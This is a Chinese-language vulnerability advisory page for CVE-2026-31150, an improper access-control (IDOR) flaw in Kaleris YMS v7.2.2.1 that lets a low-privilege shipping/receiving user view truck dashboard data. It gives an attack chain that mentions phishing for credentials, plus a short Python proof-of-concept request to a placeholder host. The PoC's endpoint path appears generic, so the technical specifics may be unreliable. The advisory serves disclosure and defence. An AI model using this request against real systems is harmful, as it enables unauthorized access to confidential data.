IPBUF安全漏洞报告
English
CVE-2026-31150 CVSS 4.3 中危

CVE-2026-31150 Kaleris YMS 访问控制缺陷漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-31150
漏洞类型
访问控制缺陷
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Kaleris YMS

相关标签

Access ControlIDORPrivilege EscalationKaleris YMSInformation Disclosure

漏洞概述

Kaleris YMS v7.2.2.1版本中存在不正确的访问控制漏洞。该漏洞允许仅具有“发货/接收”角色的低权限认证攻击者绕过权限限制,查看本应受限的卡车仪表板资源。由于系统未对特定API端点或页面访问进行严格的权限校验,攻击者利用此漏洞可获取敏感信息,导致机密性泄露。

技术细节

该漏洞的根本原因在于Kaleris YMS应用程序在处理用户请求时,未能正确实施基于角色的访问控制(RBAC)。在正常的业务逻辑中,卡车仪表板资源通常仅对管理员或特定高级角色可见。然而,在v7.2.2.1版本中,系统后端或中间件在接收到查看仪表盘的请求时,仅验证了用户是否登录,而未进一步检查用户会话中是否包含查看该特定资源所需的权限标识。攻击者首先需要获取一个具有“shipping/receiving”角色的低权限账号。登录后,攻击者通过直接构造特定的HTTP请求,直接请求卡车仪表板数据。由于服务器端的鉴权逻辑缺失,服务器返回了敏感的仪表板信息,从而实现了越权访问。

攻击链分析

STEP 1
侦察与信息收集
攻击者识别目标系统为Kaleris YMS,并确定版本为v7.2.2.1。
STEP 2
获取低权限凭证
攻击者注册、获取或通过钓鱼等方式获得一个仅具有“shipping/receiving”角色的合法账户凭证。
STEP 3
身份认证
攻击者利用低权限凭证登录应用程序,建立有效的会话。
STEP 4
越权访问尝试
攻击者使用当前会话,直接向受保护的卡车仪表板(Truck Dashboard)API或页面发送请求。
STEP 5
获取敏感信息
由于服务端缺乏权限校验,返回了本不可见的仪表板数据,导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "https://target-kaleris-yms.com/api/trucks/dashboard" # Simulated session cookie for a low-privilege user (shipping/receiving role) cookies = { "JSESSIONID": "low_priv_user_session_id_here" } # Headers to mimic a browser headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Send GET request to the restricted dashboard endpoint response = requests.get(url, headers=headers, cookies=cookies, verify=False) # Check if the request was successful and if sensitive data is returned if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print("[+] Sensitive Dashboard Data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Kaleris YMS v7.2.2.1

防御指南

临时缓解措施
建议管理员立即审查系统日志,检查是否存在异常的越权访问记录。在升级补丁前,可通过网络访问控制列表(ACL)限制低权限用户对卡车仪表板相关URL路径的访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表